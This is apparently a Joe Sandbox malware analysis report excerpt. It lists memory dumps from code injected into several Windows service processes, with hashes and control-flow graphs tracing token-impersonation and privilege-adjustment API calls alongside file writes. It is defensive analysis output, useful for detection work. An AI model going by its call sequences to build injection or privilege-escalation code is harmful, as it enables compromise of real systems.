• Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
• Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
• Instruction ID: 19712bd3b078e37e0d7036f213657200f32783deb7ea8cd5bb8c5adca78bb7cb
• Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
• Instruction Fuzzy Hash: 6DB01206228F8B8A0C2F373004081284580FF46A3C9BD1F7C9FB3D6CD2E8002C04A324

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
• Instruction ID: 68d4dd3089a7c95b7d2408ae3881b7c0a9fafc09eccb7c313147f07dea548c50
• Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
• Instruction Fuzzy Hash: 4321D92051DEA88FDF6BB32C54956B925E2F7A5328F5C03CBD086CB192C9284D05834F

Control-flow Graph (graph rendering omitted; node labels name CloseHandle at 89830b and GetTokenInformation at 898212 and 8982b2)
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
• Instruction ID: 7fd1ede4c6f6034d271c6854a6654a0471147db58a80774a6158c8fdce7f3c4d
• Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
• Instruction Fuzzy Hash: 80F0D13461DA8ACFCE6AB758905053A6BA0FF42704F6D00AAE487CBA17CE14DC01E752

Control-flow Graph (graph rendering omitted; node labels name CloseHandle at 89830b and GetTokenInformation at 898212 and 8982b2)
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
• Instruction ID: 80ec2b36202b26a7941b381228f421e10059df16ee01e528825ee0c6f5256df8
• Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
• Instruction Fuzzy Hash: B5F0903561CA4BDBCE7DB7948480A362760FB53708F6C40A9D546DBA23CE24DC01E752

Control-flow Graph (graph rendering omitted; node labels name CloseHandle at 89830b and GetTokenInformation at 898212 and 8982b2)
APIs
• CloseHandle.KERNELBASE ref: 0089830B
• GetTokenInformation.KERNELBASE ref: 00898369
Memory Dump Source
• Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
Similarity
• API ID: CloseHandleInformationToken
• String ID:
• API String ID: 3954737543-0
• Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction ID: be687cbd7259c6b5ca9c83004150f1762e1af45143a564ec6c5e8165f761b89d
• Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction Fuzzy Hash: 2BF06D3451964BDB8E69BB54848053537A0FF23758F6C4069D546DB623CE24DC02EB52

Execution Graph

Execution Coverage: 5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 56
Total number of Limit Nodes: 3
(execution graph rendering omitted; node labels name CloseHandle, GetTokenInformation, CreateThread, wcscpy and VirtualAlloc)

Control-flow Graph (graph rendering omitted; node labels name CloseHandle at 1a5830b and GetTokenInformation at 1a58212 and 1a58357)
Memory Dump Source
• Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae4adefb757c2f7bfae9a497276093c87e63d2f7c7ef2749170ec006675e2169
• Instruction ID: 5e476c11b4b1397b1e546c9e3a45ab82526ffac0de769649161fa9dea5dd4a47
• Opcode Fuzzy Hash: ae4adefb757c2f7bfae9a497276093c87e63d2f7c7ef2749170ec006675e2169
• Instruction Fuzzy Hash: 3EB1183060DE458BDB6ACB2E8480239BFB5FFD5354F1C8259DCABC7566DA389802C752

Control-flow Graph
Memory Dump Source
• Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: e247c548eaeea6e430a8624bf88735aaaf0c0aeaa4e38e5d31d111ebab7650c3
• Instruction ID: 2b58528c000bb89fa00857edd094f75ac74673392f82ed18156776d0afb28010
• Opcode Fuzzy Hash: e247c548eaeea6e430a8624bf88735aaaf0c0aeaa4e38e5d31d111ebab7650c3
• Instruction Fuzzy Hash: 7641E932E1CA098FDBEDD76C945C3397AF1EB55310F4C0296DD06CB1A2EA35940A8755

Control-flow Graph
Memory Dump Source
• Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
• Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
• Instruction ID: c8759657fc1f406a0b65941908d7d6018b7b6bb4eb992aa06f4944161261cce7
• Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
• Instruction Fuzzy Hash: CAF02433E2C94586EBEDD73C885933AA6E1E789230F580B5FDD57C90E0EA75810B8609

Control-flow Graph
Memory Dump Source
• Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
• Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
• Instruction ID: d82fb14dc2cdb8595e988988cf993f06758eb91000ffa0817a7f8289716d8c16
• Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
• Instruction Fuzzy Hash: DAB01213C3DA8A5E4396E73D040813889906F46034B781FAD9F73078D3D820140E5320

Control-flow Graph
Memory Dump Source
• Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
• Instruction ID: a4e36922f98de5dd63a95093a6ec74b624c63f10a96b8035c634565da29e6c33
• Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
• Instruction Fuzzy Hash: 91219971D2DB848FD7EB932C949C2752AB2FB95224F8D01D7DE86C7192D93849058242

Control-flow Graph
Memory Dump Source
• Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
• Instruction ID: f5acb362ab5b69f08f109d7f0b9bc8dec3bc4d0b01f4ef0e469ae612d177ddfe
• Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
• Instruction Fuzzy Hash: 76F0A47450EB518FDBEB871E905043A7FB0AF81250B4D00CAEC97CB127C6389C02C792

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 605 1a583e7-1a583e9 606 1a582c5-1a582c8 605->606 607 1a583ef 605->607 609 1a582ce 606->609 610 1a583f9 606->610 607->606 608 1a583f5-1a583f7 607->608 608->610 613 1a582d0 609->613 614 1a5828f-1a58303 call 1a872ec 609->614 611 1a582d2-1a582d7 610->611 612 1a583ff 610->612 616 1a58306-1a58309 611->616 618 1a5f524-1a5f52e 612->618 613->611 613->614 614->616 626 1a5834f-1a58355 614->626 619 1a5832e-1a58330 616->619 620 1a5830b-1a58311 CloseHandle 616->620 624 1a5f807 618->624 621 1a58332 619->621 622 1a582dd-1a582e3 619->622 620->619 621->622 625 1a58334 621->625 629 1a583a3-1a583a4 622->629 630 1a582e9 622->630 627 1a5f80d 624->627 628 1a5f8df-1a5f8e0 624->628 625->618 639 1a58341 626->639 640 1a58212-1a5821a GetTokenInformation 626->640 627->628 634 1a5f813 627->634 638 1a615a5-1a615aa 628->638 633 1a583af 629->633 630->629 631 1a582ef 630->631 641 1a582f0-1a5831c 631->641 636 1a583b5 633->636 637 1a58251-1a58256 call 1a872f4 633->637 645 1a5f78f 634->645 646 1a5f81b 634->646 636->637 642 1a583bb-1a583ca 636->642 649 1a5825b-1a58393 637->649 643 1a615ae-1a615af 638->643 639->640 647 1a58347 639->647 640->633 644 1a58220-1a58234 640->644 674 1a581e5 641->674 675 1a58322 641->675 671 1a58277-1a5827a 642->671 672 1a583d0 642->672 652 1a615b2-1a615b7 643->652 679 1a583d7-1a583dd 644->679 680 1a5823a 644->680 645->646 654 1a5f795 645->654 646->628 655 1a5834d 647->655 656 1a61638-1a61640 647->656 665 1a5827e 649->665 666 1a58399 649->666 660 1a615ba-1a615c1 652->660 654->624 655->626 658 1a61646-1a6165f 656->658 659 1a6170e-1a61727 656->659 661 1a615c7-1a615d2 658->661 663 1a61665 658->663 659->661 662 1a6172d 659->662 660->661 668 1a61750-1a617a2 call 1a872f4 660->668 677 1a615d4-1a615d6 661->677 678 1a61620-1a61623 661->678 662->668 663->668 665->620 670 1a58284 665->670 
666->665 673 1a5839f-1a583a1 666->673 670->619 685 1a5828e 670->685 683 1a58241 671->683 684 1a5827c 671->684 672->671 686 1a583d6 672->686 673->629 687 1a582a3-1a582a5 674->687 688 1a581eb 674->688 675->674 689 1a58328-1a5832c 675->689 691 1a61670-1a61684 677->691 692 1a615dc-1a615df 677->692 681 1a61625-1a61628 678->681 682 1a616a0-1a616b4 678->682 679->610 680->679 693 1a58240 680->693 681->660 694 1a6162a-1a61636 681->694 696 1a616b6-1a616b9 682->696 697 1a616f4-1a616f5 682->697 704 1a58376-1a5837b 683->704 684->665 684->683 687->610 698 1a582ab 687->698 700 1a581f1 688->700 701 1a582b2-1a582bc 688->701 689->606 689->619 691->638 695 1a6168a-1a6168d 691->695 692->660 702 1a615e1-1a615f6 692->702 703 1a6b32e-1a6b330 693->703 694->656 705 1a616dc-1a616ec 694->705 709 1a61693-1a61697 695->709 710 1a6172f-1a61738 695->710 711 1a6173a-1a6173b 696->711 712 1a616bb 696->712 722 1a616fe-1a6170c 697->722 698->610 713 1a582b1 698->713 700->701 714 1a581f7 700->714 701->606 715 1a58357-1a5836f GetTokenInformation 701->715 716 1a616d2-1a616d7 702->716 717 1a615fc-1a61600 702->717 707 1a6b332-1a6b337 call 1a872f4 703->707 708 1a6b300-1a6b302 703->708 704->641 706 1a58381 704->706 705->661 721 1a616f2 705->721 706->641 718 1a58387 706->718 707->708 729 1a6b339 707->729 720 1a616bf-1a616cd 709->720 723 1a6173f-1a61740 710->723 711->723 712->720 713->701 714->685 715->704 716->643 717->722 724 1a61606-1a61618 717->724 718->671 721->668 726 1a61744-1a61748 722->726 723->726 724->652 729->708 730 1a6b33b-1a6b33f 729->730 733 1a6b317 730->733 734 1a6b305-1a6b32d 730->734 733->734 737 1a6b2ff 733->737 734->703 737->708
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
• Instruction ID: 1b1d5f4737b9f26ab5d2866cf82112501d3cad8559cb79864e691396c81ae86b
• Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
• Instruction Fuzzy Hash: 48F0903450DA41EFDBF7871E844093E2FB0AB41290B5C0049DD66CB127D23CD802C752

Control-flow Graph

[Control-flow graph rendering omitted: basic blocks 1a581e5-1a6b33f, entry 1a58318; API calls CloseHandle and GetTokenInformation; internal calls to 1a872ec and 1a872f4]
APIs
• CloseHandle.KERNELBASE ref: 01A5830B
• GetTokenInformation.KERNELBASE ref: 01A58369
Memory Dump Source
• Source File: 0000000C.00000002.2140837874.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1a50000_maintenanceservice.jbxd
Similarity
• API ID: CloseHandleInformationToken
• String ID:
• API String ID: 3954737543-0
• Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction ID: de0b61b8b4deefd0761306af99cbfcc6763de442f640ac933f78f0a3c4536380
• Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction Fuzzy Hash: D5F03A3451EB51EFABE78B1E944093A7FB0BF412A4B5C4449ED96CB123D63CD842CB92

Execution Graph

Execution Coverage: 5.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 56
Total number of Limit Nodes: 3

[Execution graph rendering omitted: entry points b783e7, b781e3, b75d22, b75d50, b75b8f and b758de; API calls CloseHandle, GetTokenInformation, CreateThread, VirtualAlloc and wcscpy]

Control-flow Graph

[Control-flow graph rendering omitted: basic blocks b781c0-b8b33f, entry b781c0; API calls GetTokenInformation and CloseHandle; internal calls to ba72ec and ba72f4]
Memory Dump Source
• Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
• Instruction ID: da1282e7f701a949ab6469d00cd263f12d24f2457289bfc3cd09ba90d0383fe5
• Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
• Instruction Fuzzy Hash: 74B1323054DA468BCB299B2C84C4675B7E6FFA5310F28C6DDD8AF87176EE249C02C356

Control-flow Graph

[Control-flow graph rendering omitted: basic blocks b75b8f-b75dcd, entry b75b8f; API calls CreateThread and CloseHandle; internal calls to b853f0, ba8358, b90320, b781c0, ba72ec, b75e60, b75990, b752d0, b75df0 and b91520]
APIs
Memory Dump Source
• Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
• Instruction ID: acc0ec5d0c752b228d3e641b54d7c4a6d17dab6da0937feaa78964d02e40c548
• Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
• Instruction Fuzzy Hash: A441F62060CF098FDB7A9B3C8899B7936D0EB99310F54C5F6903ECB1A1DEE48C419746

Control-flow Graph

[Control-flow graph rendering omitted: basic blocks b75bf7-b75dcd, entry b75d22; API calls CreateThread and CloseHandle; internal calls to b752d0, b75e60 and b75990]
APIs
Memory Dump Source
• Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
• Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
• Instruction ID: 4d22d97521ccfd7e8ce7e737a742bd95a344cf6cbb0bdd76c1625732a472f004
• Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
• Instruction Fuzzy Hash: 5EF0F621A1CF4945DB3D8638889977A61C1E799321F65CBFED13FC90D0DEE54901A205

Control-flow Graph

[Control-flow graph rendering omitted: basic blocks b75bf7-b75dcd, entry b75d50; API calls CreateThread and CloseHandle; internal calls to b75e60, b75990 and b752d0]
APIs
Memory Dump Source
• Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
• Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
• Instruction ID: 3805d46fb4ebda9422e0e51f6ac95413c565d62f8b317339441cb61851183002
• Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
• Instruction Fuzzy Hash: C2B01201028F8B45003A1B30054866855C4EE46634D76AFFC9F7B068D2DCC00C066320

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
• Instruction ID: 5363d16ca33d0d830b63fd55cf8a5763aee44cdc8f7bd1c9d4b0556087875321
• Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
• Instruction Fuzzy Hash: 0221FB3191DE888FC77A931C44D12B526E2F795324F58C3FBD0BEC7192D9E84E059252

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
• Instruction ID: 7040228e0e7aa998792667489d42ffca5f50a51897c903de6c069facce530e83
• Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
• Instruction Fuzzy Hash: 07F0F43454DA42CFC62A871C909843A6BE1EF51701B5AC0DEE46ECB113CE14CC05E7AB

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
• Instruction ID: f7bd3321fa0fc9eaa66faf8d90dda4c74f701fc012e7e6e12b8ec862162b1e2b
• Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
• Instruction Fuzzy Hash: 58F0903459C942CB87398708948C53627E1EB61702B6DC0D9D47ECB263CE24DC05E76B

Control-flow Graph

APIs
• CloseHandle.KERNELBASE ref: 00B7830B
• GetTokenInformation.KERNELBASE ref: 00B78369
Memory Dump Source
• Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
Similarity
• API ID: CloseHandleInformationToken
• String ID:
• API String ID: 3954737543-0
• Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction ID: 495f64b77fa130cebd8928c5cbf2779e0241479478b1722e6dbd03456dedd5f0
• Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
• Instruction Fuzzy Hash: 57F0903459D642CB8A358B18D48853537E0EF25751B6DC0D9D47EDB123CE24DD02E76B

Execution Graph

Execution Coverage: 0.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 6.8%
Total number of Nodes: 355
Total number of Limit Nodes: 6
6c5c10 ReadFile SetFilePointerEx _strlen 50898->50917 50899 6e2ebb 50900->50794 50900->50833 50902 6e2edb 50903->50859 50903->50868 50903->50880 50903->50893 50906 6e2d08 50903->50906 50905->50860 50905->50875 50905->50899 50905->50903 50907 6e3079 50905->50907 50915 6c5c10 ReadFile SetFilePointerEx _strlen 50905->50915 50906->50875 50907->50786 50907->50847 50908->50786 50909->50824 50910->50896 50911->50887 50912->50906 50913->50831 50914->50862 50915->50905 50916->50895 50917->50902 50918->50854 50919->50895 50920->50813 50921->50884 50922->50821 50923->50830 50924->50851 50925->50850 50926->50808 50927->50782 50980 6ff600 26 API calls 50556 6c8318 GetTokenInformation 50557 6c8151 50556->50557 50558 6c81ea CloseHandle 50557->50558 50560 6c7360 50557->50560 50667 6c5c10 _strlen 50557->50667 50558->50560 50559 6c6cc8 50561 6c716d 50559->50561 50575 6c7023 50559->50575 50604 6c6da0 _strlen 50559->50604 50559->50667 50560->50559 50605 6c5d9e 50560->50605 50560->50667 50562 6c5f1c SetFilePointerEx 50561->50562 50561->50575 50563 6e3658 GetFileSizeEx 50564 6f1f67 50721 6c482b 46 API calls _strlen 50564->50721 50565 6f1c92 RtlAdjustPrivilege 50565->50575 50566 6c62e0 ReadFile SetFilePointerEx 50669 6e3ec6 50566->50669 50567 6e2a4d GetEnvironmentVariableW 50571 6e2a9f GetTempPathW 50567->50571 50572 6e2a58 50567->50572 50569 6cefff 50573 6cf007 SetFilePointerEx 50569->50573 50676 6ce381 50569->50676 50570 6e522a 50577 6e364a 50570->50577 50585 6e3566 50570->50585 50589 6e46bc 50570->50589 50574 6f1f70 50576 6f1f7e RtlExitUserThread 50574->50576 50575->50564 50575->50565 50587 6f1cd1 NtQuerySystemInformation 50575->50587 50575->50667 50584 6e3656 50577->50584 50577->50585 50578 6e2ad0 50583 6e2ad2 wsprintfW 50578->50583 50579 6e2b31 50580 6d0a10 46 API calls 50618 6e296b _wcslen 50580->50618 50581 6e3047 50594 6e3059 50581->50594 50674 6e3018 50581->50674 50582 6e2a40 50596 6e2a4c 50582->50596 50623 6e2421 50582->50623 50582->50667 50627 6e29c4 50583->50627 50584->50563 
50641 6e2bdc 50585->50641 50585->50667 50672 6e382e 50585->50672 50586 6ef6c9 50720 6c5c10 ReadFile SetFilePointerEx _strlen 50586->50720 50658 6f1ce8 50587->50658 50588 6e4bb4 GetTickCount 50719 6c5c10 ReadFile SetFilePointerEx _strlen 50588->50719 50589->50586 50601 6efc86 50589->50601 50591 6e4341 50593 6e4909 50591->50593 50603 6e434d 50591->50603 50592 6f1cfc RtlInitUnicodeString 50602 6f1d40 RtlEqualUnicodeString 50592->50602 50596->50567 50675 6e3334 50596->50675 50599 6e2b76 50619 6e2b8f 50599->50619 50599->50623 50633 6e2bca 50599->50633 50600 6ef9fa 50602->50658 50716 6c5c10 ReadFile SetFilePointerEx _strlen 50603->50716 50604->50563 50604->50570 50604->50581 50604->50588 50604->50591 50608 6e45b6 50604->50608 50609 6e46a3 50604->50609 50612 6e2de7 50604->50612 50613 6e3ee3 CloseHandle 50604->50613 50616 6e44b4 CreateFileW 50604->50616 50604->50618 50604->50623 50604->50627 50636 6e49b4 50604->50636 50645 6e428f 50604->50645 50652 6e338d 50604->50652 50604->50667 50604->50669 50604->50672 50695 6c5dfe 50604->50695 50632 6c5da4 50605->50632 50605->50667 50679 6c5f4a 50605->50679 50606 6e329e 50607 6e453d 50717 6c5c10 ReadFile SetFilePointerEx _strlen 50608->50717 50609->50589 50609->50608 50707 6c5c10 ReadFile SetFilePointerEx _strlen 50612->50707 50613->50607 50614 6e4353 50615 6ce6c3 50622 6ce6c4 ReadFile 50615->50622 50616->50604 50616->50669 50617 6e2abb 50618->50567 50618->50569 50618->50571 50618->50578 50618->50580 50618->50582 50618->50599 50618->50627 50618->50633 50653 6e2d17 50618->50653 50618->50667 50684 6e29db 50618->50684 50619->50623 50619->50627 50619->50667 50629 6ce337 50622->50629 50630 6ce66f 50622->50630 50623->50667 50702 6e29fc 50 API calls 50623->50702 50624 6e4927 50718 6c5c10 ReadFile SetFilePointerEx _strlen 50624->50718 50625 6e2ded 50637 6ce33d 50625->50637 50642 6e2dff 50625->50642 50626 6f1d90 NtOpenThread 50639 6f1df5 NtImpersonateThread 50626->50639 50626->50658 50627->50579 50703 6c482b 46 API calls _strlen 50627->50703 
50628 6e2c90 50640 6e331c 50628->50640 50650 6e2cff 50628->50650 50629->50637 50685 6ce31d 50629->50685 50651 6c5df2 ReadFile 50632->50651 50632->50667 50633->50583 50633->50641 50635 6e2d1d 50636->50645 50636->50652 50712 6c5c10 ReadFile SetFilePointerEx _strlen 50637->50712 50648 6f1e24 NtOpenThreadTokenEx 50639->50648 50639->50658 50640->50596 50640->50627 50666 6e2fe7 50640->50666 50641->50628 50649 6e2c81 50641->50649 50708 6c5c10 ReadFile SetFilePointerEx _strlen 50642->50708 50643 6e3169 GetTickCount 50643->50652 50697 6e317d 50643->50697 50644 6e4938 50645->50623 50662 6e3cd5 50645->50662 50647 6e3003 50656 6e2cbf 50647->50656 50663 6e3012 50647->50663 50648->50658 50649->50666 50688 6e2ec3 50649->50688 50706 6c5c10 ReadFile SetFilePointerEx _strlen 50650->50706 50651->50667 50651->50695 50652->50642 50660 6e345d 50652->50660 50661 6e3139 50652->50661 50652->50697 50653->50623 50653->50635 50653->50643 50653->50649 50699 6e2ea3 50653->50699 50654 6ce329 WriteFile 50654->50629 50654->50685 50655 6e2e05 50705 6c5c10 ReadFile SetFilePointerEx _strlen 50656->50705 50658->50575 50658->50592 50658->50602 50658->50626 50659 6f1ed9 NtClose 50658->50659 50664 6f1ee7 NtClose 50658->50664 50682 6f1e4e NtAdjustPrivilegesToken 50658->50682 50659->50658 50715 6c5c10 ReadFile SetFilePointerEx _strlen 50660->50715 50713 6c5c10 ReadFile SetFilePointerEx _strlen 50661->50713 50662->50613 50662->50667 50673 6e2c72 50663->50673 50663->50674 50664->50658 50668 6e255c 50668->50623 50668->50667 50698 6e257b 50668->50698 50669->50566 50669->50604 50669->50613 50669->50616 50669->50623 50669->50667 50669->50668 50669->50672 50669->50695 50672->50667 50672->50673 50672->50674 50704 6c5c10 ReadFile SetFilePointerEx _strlen 50673->50704 50674->50581 50674->50667 50714 6c5c10 ReadFile SetFilePointerEx _strlen 50674->50714 50676->50615 50676->50622 50676->50685 50687 6ce38d 50676->50687 50677 6e3463 50679->50562 50679->50667 50680 6e2cc8 50682->50658 50682->50659 50684->50623 
